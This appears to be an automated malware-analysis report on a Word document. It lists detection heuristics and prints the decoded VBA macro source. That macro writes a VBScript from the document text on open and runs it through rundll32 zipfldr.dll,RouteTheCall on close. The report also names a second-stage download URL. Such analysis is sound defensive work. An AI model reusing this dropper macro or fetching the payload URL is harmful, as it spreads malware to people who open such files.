Malware Insights
The sample contains a VBA macro that executes upon opening. The Document_Open macro attempts to create a directory and write a VBScript file named 'about1.vbs' to 'c:\wordpress\about1.vbs'. The content for this VBScript is derived from the document's text. The Document_Close macro then uses GetObject to execute 'rundll32 zipfldr.dll,RouteTheCall c:\wordpress\about1.vbs', which is likely intended to run the downloaded payload. The embedded URL 'http://btcxchange.online/fc4b1cbbb9d731f9a264cddf3971f0bc/windows/urgently.exe' is highly suspicious and likely the second-stage payload.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set curw = GetObject(FieldWord1) curw.create "rundll32 zipfldr.dll,RouteTheCall c:\wordpress\about1.vbs", Null, Null, 0 End Sub -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
FieldWord1 = FieldWord1 + FieldWord2 + FieldWord3 + FieldWord4 + FieldWord5 Set curw = GetObject(FieldWord1) curw.create "rundll32 zipfldr.dll,RouteTheCall c:\wordpress\about1.vbs", Null, Null, 0 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Set n = New FileSystemObject -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://btcxchange.online/fc4b1cbbb9d731f9a264cddf3971f0bc/windows/urgently.exe In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 962 bytes |
SHA-256: a35a6c29e29a297a03ad35fe34655d93202d73701c53b2846a2c77a42809ec56 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Set FieldWord1 = ActiveDocument.Words(67)
Set FieldWord2 = ActiveDocument.Words(68)
Set FieldWord3 = ActiveDocument.Words(69)
Set FieldWord4 = ActiveDocument.Words(70)
Set FieldWord5 = ActiveDocument.Words(71)
FieldWord1 = FieldWord1 + FieldWord2 + FieldWord3 + FieldWord4 + FieldWord5
Set curw = GetObject(FieldWord1)
curw.create "rundll32 zipfldr.dll,RouteTheCall c:\wordpress\about1.vbs", Null, Null, 0
End Sub
Private Sub Document_Open()
Set n = New FileSystemObject
On Error Resume Next
n.CreateFolder "c:\..\wordpress"
Set s = n.CreateTextFile("c:\wordpress\about1.vbs")
s.WriteLine (Right(Range.Text, 13433))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.